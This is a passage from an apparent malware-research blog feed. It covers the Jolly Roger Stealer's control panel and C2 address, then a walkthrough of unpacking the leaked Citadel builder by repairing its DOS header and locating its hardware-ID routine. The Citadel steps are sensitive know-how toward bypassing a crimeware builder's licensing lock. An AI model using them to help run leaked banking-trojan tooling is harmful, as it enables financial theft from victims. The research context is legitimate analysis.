&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoTvdY77YOzmAC1oNGkfZF06mZc9527iUFxa4odbILT_2m0-uX5lMfe3zHrKELsyBYIAiK7WUSn1a9AYkiA3pTgA1xYNxL10QYrKmB4leUJTk4BzHpaYs39Wn5IiOfQDCxSzh-409rES4/s1600/06-01-2014+04-13-16_b.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoTvdY77YOzmAC1oNGkfZF06mZc9527iUFxa4odbILT_2m0-uX5lMfe3zHrKELsyBYIAiK7WUSn1a9AYkiA3pTgA1xYNxL10QYrKmB4leUJTk4BzHpaYs39Wn5IiOfQDCxSzh-409rES4/s1600/06-01-2014+04-13-16_b.png&quot; height=&quot;250&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
That all for the moment :)</description><link>https://www.xylibox.com/2014/01/trojwowspy-a.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMWTxLW7aG_9SFBQCQHzaY3zMXL5Aj7JTw8HOZMdI1Km4gYCogiMMOP3dtEAsdt8BDapAwLru_EtGCBSm1enK-khvvbbLyfh_BLEzw5ykhoN43IQHhdkJmu4peCXuCrm1YbNf7MCIYOM/s72-c/10-01-2014+00-55-11.jpg" height="72" width="72"/><thr:total>6</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8136658434817847616</guid><pubDate>Thu, 02 Jan 2014 19:48:00 +0000</pubDate><atom:updated>2014-01-02T20:48:24.184+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Jolly Roger Stealer</category><category domain="http://www.blogger.com/atom/ns#">lame</category><category domain="http://www.blogger.com/atom/ns#">stealer</category><title>Jolly Roger Stealer</title><description>Friend Kafeine have already do &lt;a href=&quot;http://malware.dontneedcoffee.com/2013/10/jolly-roger-stealer-c-panel.html&quot;&gt;a post&lt;/a&gt; on it, although someone recently sent me a url on my cybercrime tracker.. i give a f%$k&lt;br /&gt;
• dns: 1 ›› ip: 178.162.193.24 - adresse: LOADER.ISTMEIN.DE&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHDVfJ_9j9JnJPcxOWl3rQei5K6TbZBde5Ohw2Ta1yYkVsgmBQHvIQJeGG7cOoQ2IpYkB2zGyhDWgR5ybwO6vECGtbwKJUDBrr-9ccfAgKZAvoINkvyKK_E6Z68kNlyKUMmoEda2blbA/s1600/27-12-2013+12-20-12.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;252&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHDVfJ_9j9JnJPcxOWl3rQei5K6TbZBde5Ohw2Ta1yYkVsgmBQHvIQJeGG7cOoQ2IpYkB2zGyhDWgR5ybwO6vECGtbwKJUDBrr-9ccfAgKZAvoINkvyKK_E6Z68kNlyKUMmoEda2blbA/s400/27-12-2013+12-20-12.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bot statistic:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgufh4gNxjnxjsv3bXqpDTorvaC1WgodtRvaWtWQ_hHGhHyOp4it89gh9UZugr7raLdxiIQkoybA-ZrbJxo80Be4Ea752C9Sw46uO8vJX8SYiV9W6WzwxJXTvQuTsVTKbczpDF1UjtruVM/s1600/27-12-2013+12-20-55.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;252&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgufh4gNxjnxjsv3bXqpDTorvaC1WgodtRvaWtWQ_hHGhHyOp4it89gh9UZugr7raLdxiIQkoybA-ZrbJxo80Be4Ea752C9Sw46uO8vJX8SYiV9W6WzwxJXTvQuTsVTKbczpDF1UjtruVM/s400/27-12-2013+12-20-55.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
CPU &quot;Arhitecture&quot;&lt;br /&gt;
&lt;br /&gt;
Task:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY_jnl1JU066h4y2-b6XiK33DmjzK7VelHhBBdj0eKbd5vvbzBKOhntFCtaDPAnJM1XLmTdf4UKllKOUI_Dy7hkBtPocEqAoXxrvU2puk9foMhyphenhyphenx3fz1aEySCcvytJswuqIkrU_zP3Weo/s1600/27-12-2013+12-21-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;142&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY_jnl1JU066h4y2-b6XiK33DmjzK7VelHhBBdj0eKbd5vvbzBKOhntFCtaDPAnJM1XLmTdf4UKllKOUI_Dy7hkBtPocEqAoXxrvU2puk9foMhyphenhyphenx3fz1aEySCcvytJswuqIkrU_zP3Weo/s400/27-12-2013+12-21-41.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Search module:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RjvmlAIm7az8ElT6sQh0shIEhCAoGNeyKJExX5rCRFJ-RFI3y9DwCaR-HoBvq3tiEVBx_2JYvgl-buH0W4rPwYxsA5oUdto3DG9fn5JVfxsd9slVTZL-FTGEAjX3V0x1D0-rceMwis/s1600/27-12-2013+12-26-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;121&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RjvmlAIm7az8ElT6sQh0shIEhCAoGNeyKJExX5rCRFJ-RFI3y9DwCaR-HoBvq3tiEVBx_2JYvgl-buH0W4rPwYxsA5oUdto3DG9fn5JVfxsd9slVTZL-FTGEAjX3V0x1D0-rceMwis/s400/27-12-2013+12-26-49.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
HTTP:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYnXLtDK0oNv6ZE_k6DRgtos81hofitWvsXQzH4ZzyRvaymYN3fwxWOYtj1wUPAoWnTDM-pBU_CH9N9oD7WbECIWnHcNULTxWgBL7F4L-IyK4OI0SMhv12nQ1yM2qNfo70GN35D8EHVxo/s1600/27-12-2013+12-24-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;195&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYnXLtDK0oNv6ZE_k6DRgtos81hofitWvsXQzH4ZzyRvaymYN3fwxWOYtj1wUPAoWnTDM-pBU_CH9N9oD7WbECIWnHcNULTxWgBL7F4L-IyK4OI0SMhv12nQ1yM2qNfo70GN35D8EHVxo/s400/27-12-2013+12-24-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Mail:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPIMXym94zsvy0YNkkCbQUfXCuyW2qKzbJRFj8YvrmjXlnW0R_XPa8sUb5RuL6iMXa0T_cJJyINpNmU6rJNgt1ycpFdtapX_O6oMHbzEZaoXPIdgS6BOhf7m8_rnTBYghUFLe2mXnT-0/s1600/27-12-2013+12-25-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;76&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPIMXym94zsvy0YNkkCbQUfXCuyW2qKzbJRFj8YvrmjXlnW0R_XPa8sUb5RuL6iMXa0T_cJJyINpNmU6rJNgt1ycpFdtapX_O6oMHbzEZaoXPIdgS6BOhf7m8_rnTBYghUFLe2mXnT-0/s400/27-12-2013+12-25-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Create task:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrvkxSRmGRLAHVf8FHJ9XP3WEcX65-agQtpzr8dUq_yg4bgD5qXMs6kPLc7AZ7Z3srpD5_1KP31E6uLyXcGXf_zyo_2s0tyeT8nBq4GcuH2K59hfhpyRTW2oRulqdNbLvYNpK3SCoodlo/s1600/27-12-2013+12-22-07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;142&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrvkxSRmGRLAHVf8FHJ9XP3WEcX65-agQtpzr8dUq_yg4bgD5qXMs6kPLc7AZ7Z3srpD5_1KP31E6uLyXcGXf_zyo_2s0tyeT8nBq4GcuH2K59hfhpyRTW2oRulqdNbLvYNpK3SCoodlo/s400/27-12-2013+12-22-07.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Task statistic:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLQjFFt3I2Epb5usVSVzEYlGrJzsJO83Rtktg8tdpsoyRVTTppDyNBuWnHZRrW3goES1YIV9OgfKj-KVpQULI7wolxosOo0dEn0Ii6xOWjcBnpYCJCCh53gSXarDoqggoLsVFpBIc1_Uo/s1600/27-12-2013+12-23-00.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;107&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLQjFFt3I2Epb5usVSVzEYlGrJzsJO83Rtktg8tdpsoyRVTTppDyNBuWnHZRrW3goES1YIV9OgfKj-KVpQULI7wolxosOo0dEn0Ii6xOWjcBnpYCJCCh53gSXarDoqggoLsVFpBIc1_Uo/s400/27-12-2013+12-23-00.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;I haven&#39;t looked at a sample because i don&#39;t have it but sound very lame, like Plasma HTTP who grab everything without checking if there is already a double.</description><link>https://www.xylibox.com/2014/01/jolly-roger-stealer.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHDVfJ_9j9JnJPcxOWl3rQei5K6TbZBde5Ohw2Ta1yYkVsgmBQHvIQJeGG7cOoQ2IpYkB2zGyhDWgR5ybwO6vECGtbwKJUDBrr-9ccfAgKZAvoINkvyKK_E6Z68kNlyKUMmoEda2blbA/s72-c/27-12-2013+12-20-12.png" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-5811297081097438185</guid><pubDate>Tue, 31 Dec 2013 13:28:00 +0000</pubDate><atom:updated>2013-12-31T14:28:52.337+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Backdoor.Citadel.BkCnct</category><category domain="http://www.blogger.com/atom/ns#">C1F20D2340B519056A7D89B7DF4B0FFF</category><category domain="http://www.blogger.com/atom/ns#">Citab</category><category domain="http://www.blogger.com/atom/ns#">Citadel</category><category domain="http://www.blogger.com/atom/ns#">Citadel 1.3.5.1</category><category domain="http://www.blogger.com/atom/ns#">Citadel 1.3.5.1 Remote Code Execution</category><category domain="http://www.blogger.com/atom/ns#">Citadel Hardware ID</category><category domain="http://www.blogger.com/atom/ns#">Citadel leak</category><category domain="http://www.blogger.com/atom/ns#">Cracking Citadel</category><category domain="http://www.blogger.com/atom/ns#">Hacktool.Citadel.Builder</category><title>How the protection of Citadel got cracked</title><description>Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server)&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyYb2AuY7UJRqX5XJ7vzyJ-unafw2IhZUx3TIBKqAaCqctzWCS22mggcaB_DLCssPWnhXIiuatBZq6gyiYVScMkS9krtoG0byang2YSSLtVFauWcgJ1y64l8B7RUCuY9fXYwXbCUoNbGg/s1600/29-12-2013+17-51-47.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;106&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyYb2AuY7UJRqX5XJ7vzyJ-unafw2IhZUx3TIBKqAaCqctzWCS22mggcaB_DLCssPWnhXIiuatBZq6gyiYVScMkS9krtoG0byang2YSSLtVFauWcgJ1y64l8B7RUCuY9fXYwXbCUoNbGg/s400/29-12-2013+17-51-47.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
If you want to read more about the Backconnect on Citadel, the link that g4m372 shared is cool: &lt;a href=&quot;http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html&quot;&gt;http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
I&#39;ve searched this file thought downloading a random mirror of the Citadel leaked package in hope to find it inside.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Finally the file wasn&#39;t on the leaked archive but was already grabbed by various malware trackers.&lt;br /&gt;
MD5: &lt;a href=&quot;http://vxvault.siri-urz.net/ViriList.php?MD5=50a59e805eeb228d44f6c08e4b786d1e&quot;&gt;50A59E805EEB228D44F6C08E4B786D1E&lt;/a&gt;&lt;br /&gt;
Malwarebytes: Backdoor.Citadel.BkCnct&lt;br /&gt;
&lt;br /&gt;
And since i&#39;ve downloaded the leaked Citadel package... let&#39;s see about the Builder.&lt;br /&gt;
It can be interesting to make a post about it.&lt;br /&gt;
&lt;br /&gt;
Citadel.exe: a33fb3c7884050642202e39cd7f177e0&lt;br /&gt;
Malwarebytes: Hacktool.Citadel.Builder&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4SdNffd8_9lnaTUxWr6fllT0E65UtZ2HJMWtn-5ww1QTTGUqAqwd4t55QE2ZwHZphwIsvFoWSFwtvq_xrsk_biH3i8D81Z_ceeywEsK51W-xGz7pLzpKUJi3xRdbEJZHS68p0Rdz-SWg/s1600/29-12-2013+18-08-59.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;306&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4SdNffd8_9lnaTUxWr6fllT0E65UtZ2HJMWtn-5ww1QTTGUqAqwd4t55QE2ZwHZphwIsvFoWSFwtvq_xrsk_biH3i8D81Z_ceeywEsK51W-xGz7pLzpKUJi3xRdbEJZHS68p0Rdz-SWg/s400/29-12-2013+18-08-59.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&quot;ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated.&quot;&lt;br /&gt;
&lt;br /&gt;
This file is packed with UPX:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOxZwxHcO3GcmdaJ5YPLDJCbdNA8JiXYBTUd7c-aYcTrhoI9cY9n1_pBBJxBGvffI19eO4hgWcoAuCEA-yk0qZ_eCYfSIlQ2wWBckPORczowJMHdxCARPJGEDysn1257gH4u4Raucogac/s1600/23-12-2013+00-56-02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;222&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOxZwxHcO3GcmdaJ5YPLDJCbdNA8JiXYBTUd7c-aYcTrhoI9cY9n1_pBBJxBGvffI19eO4hgWcoAuCEA-yk0qZ_eCYfSIlQ2wWBckPORczowJMHdxCARPJGEDysn1257gH4u4Raucogac/s400/23-12-2013+00-56-02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Same for the Citadel Backconnect Server and the Hardware ID generator.&lt;br /&gt;
But when we try to unpack it via UPX we have an exception:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oD2f3-JpH2q9u1WsFogxTvWigrCDzGszVYZ7apckh9b-K6UlquAhwFrW0xBge3ExsGrbDsRuLAJzZKIogShNQCSU5KTV0XcFzps_HPeWmGW2vNPPPpcQtCBDHJZro_S1ppJb8tLPs3o/s1600/29-12-2013+18-11-37.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;96&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oD2f3-JpH2q9u1WsFogxTvWigrCDzGszVYZ7apckh9b-K6UlquAhwFrW0xBge3ExsGrbDsRuLAJzZKIogShNQCSU5KTV0XcFzps_HPeWmGW2vNPPPpcQtCBDHJZro_S1ppJb8tLPs3o/s400/29-12-2013+18-11-37.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
UPX told us that there is something wrong with the file header, aquabox used a lame trick.&lt;br /&gt;
With an hexadecimal editor we can clearly see that there is a problem with the DOS Header:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjomAmmijYZlZYYxprcGwIdfx1SIEvR0wzNeeOZDUWo0-pJY8HWh31Xu7a_E1OcehXoC7SVBvSOz9B8DClhwAvVZbVN4mQGE2UWXfJh8H4UikElSG5i59OzO8Gf8EnMdn9-6MUEUIUR9r4/s1600/29-12-2013+18-14-36.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;202&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjomAmmijYZlZYYxprcGwIdfx1SIEvR0wzNeeOZDUWo0-pJY8HWh31Xu7a_E1OcehXoC7SVBvSOz9B8DClhwAvVZbVN4mQGE2UWXfJh8H4UikElSG5i59OzO8Gf8EnMdn9-6MUEUIUR9r4/s400/29-12-2013+18-14-36.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory.&lt;br /&gt;
&lt;a href=&quot;http://pe101.corkami.com/&quot;&gt;e_lfanew&lt;/a&gt; is null, so let&#39;s fix it at 18h by 0x40&lt;br /&gt;
Miracle:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXJV0syMrng48Ei_M9BDH3rGbGA87Crz8M1Y1-gNkBWqzSK3XISQ_FlTXJzuGO_VbbMup5pY_hc0Bwke1dfHPBQ16HELw0Sc0YCChEv3NbptuPy4v0q3kpsaQEKy_7xGsa2uJJQ7oA6as/s1600/29-12-2013+18-23-57.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;117&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXJV0syMrng48Ei_M9BDH3rGbGA87Crz8M1Y1-gNkBWqzSK3XISQ_FlTXJzuGO_VbbMup5pY_hc0Bwke1dfHPBQ16HELw0Sc0YCChEv3NbptuPy4v0q3kpsaQEKy_7xGsa2uJJQ7oA6as/s400/29-12-2013+18-23-57.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Same tricks for the Hardware ID Calculator and the Citadel Backconnect Server, i will get back on these two files later.&lt;br /&gt;
Now that we have a clear code we can know the Time/Date Stamp, view the ressources, but more interesting: see how Citadel is protected&lt;br /&gt;
&lt;br /&gt;
Viewing the strings already give us a good insight:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg10TU-4uHcdzXNkwRIM6zGy_WB3aOchb1Wv0P1Bj-EwTVJ2H3E_jnZMUjyg4wIP-kdYVSb6ipJS_Tr_dQaFxb1JnJyZbONUKFmWnN1IkqRDRT2EmLpyhEWoMaO6sctAMKTWkqDhPxgaWQ/s1600/29-12-2013+18-29-14.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;165&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg10TU-4uHcdzXNkwRIM6zGy_WB3aOchb1Wv0P1Bj-EwTVJ2H3E_jnZMUjyg4wIP-kdYVSb6ipJS_Tr_dQaFxb1JnJyZbONUKFmWnN1IkqRDRT2EmLpyhEWoMaO6sctAMKTWkqDhPxgaWQ/s400/29-12-2013+18-29-14.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber...&lt;br /&gt;
&lt;br /&gt;
But we don&#39;t even really need to waste time trying to know how the generation is made.&lt;br /&gt;
Although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2)&lt;br /&gt;
At the end, you will be here, this routine will finalise your HID:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirU5rcuoDpaazLKZEeUMCgc2xssokCF98-g0VTFnTHxj3sAy4HuSJmYpYY7fccJD4qRwcZCRdrdNcNTCHvcQISOmGu08C-exmIUw7hl-v22CzszV0wn2j2IYKT3Qby4TO-ChOVyVTxvfE/s1600/29-12-2013+18-43-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;220&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirU5rcuoDpaazLKZEeUMCgc2xssokCF98-g0VTFnTHxj3sAy4HuSJmYpYY7fccJD4qRwcZCRdrdNcNTCHvcQISOmGu08C-exmIUw7hl-v22CzszV0wn2j2IYKT3Qby4TO-ChOVyVTxvfE/s400/29-12-2013+18-43-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
From another side, you can also have a look on the Hardware ID Calculator.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLPOZ4EL_WixHubhswyuWqWmdX3ijJVx4OETwxqA5kDEy04ulEUnoKn0jueVvdAaC3gd2hGoslGrNvRFN4doYww_1OFkHfKejdxBDjOVBwDTgz4K1AQ5nqIoNQyYcODeHz9_fl4O-ZysM/s1600/29-12-2013+18-48-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLPOZ4EL_WixHubhswyuWqWmdX3ijJVx4OETwxqA5kDEy04ulEUnoKn0jueVvdAaC3gd2hGoslGrNvRFN4doYww_1OFkHfKejdxBDjOVBwDTgz4K1AQ5nqIoNQyYcODeHz9_fl4O-ZysM/s1600/29-12-2013+18-48-42.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;I&#39;ve got a problem with this file, the first layer was a SFX archive:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0oWBI2HBDl1fYHGgKQpEBnn0EnqMiRg706uHLRiE5VGvgePZ8pCMuoi6ZyEB1Kg4JY2Nk0sh67xTOVKfROv-mmN7mgY7dTVnIgZ5NPlxKFJgoBR-J5lMZ64qRuq8I9BH0zlbd4CzjMM/s1600/29-12-2013+19-02-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;202&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0oWBI2HBDl1fYHGgKQpEBnn0EnqMiRg706uHLRiE5VGvgePZ8pCMuoi6ZyEB1Kg4JY2Nk0sh67xTOVKfROv-mmN7mgY7dTVnIgZ5NPlxKFJgoBR-J5lMZ64qRuq8I9BH0zlbd4CzjMM/s400/29-12-2013+19-02-08.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Malware embedded (stealer):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiazy6RRxkMvCv9ptkg8D9A9uBUvbbChfFMuNlUkBy9jOU3H5Nr0wLDdp6dT-dACJQShXqEdKABmcWnKbvuEHrPOlqmmhZjbCw99z0ie7yN274RIvR6hZ-1kIPWf7Dt6Ol_XOhHkAR_Omc/s1600/29-12-2013+19-04-07.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;233&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiazy6RRxkMvCv9ptkg8D9A9uBUvbbChfFMuNlUkBy9jOU3H5Nr0wLDdp6dT-dACJQShXqEdKABmcWnKbvuEHrPOlqmmhZjbCw99z0ie7yN274RIvR6hZ-1kIPWf7Dt6Ol_XOhHkAR_Omc/s320/29-12-2013+19-04-07.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVol9s-Q7feDxPIfZmHgsMOmMmYS-RKG5URh-XVPJjDeXJXOg4gaXlslGlINsqw3g_nw2PJAjj0Ns8Q3kT6Qf_ak3xhFRDFwSgptYzaO-2t0NDPFe0s0UIX0JiK5XOqSKAQeXNufXJ17g/s1600/29-12-2013+19-06-57.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;106&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVol9s-Q7feDxPIfZmHgsMOmMmYS-RKG5URh-XVPJjDeXJXOg4gaXlslGlINsqw3g_nw2PJAjj0Ns8Q3kT6Qf_ak3xhFRDFwSgptYzaO-2t0NDPFe0s0UIX0JiK5XOqSKAQeXNufXJ17g/s400/29-12-2013+19-06-57.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Conclusion: Don&#39;t rush on leaked stuff.&lt;br /&gt;
&lt;br /&gt;
Alright, now that you have extracted/unpacked the good HID Calculator you can open it in olly.&lt;br /&gt;
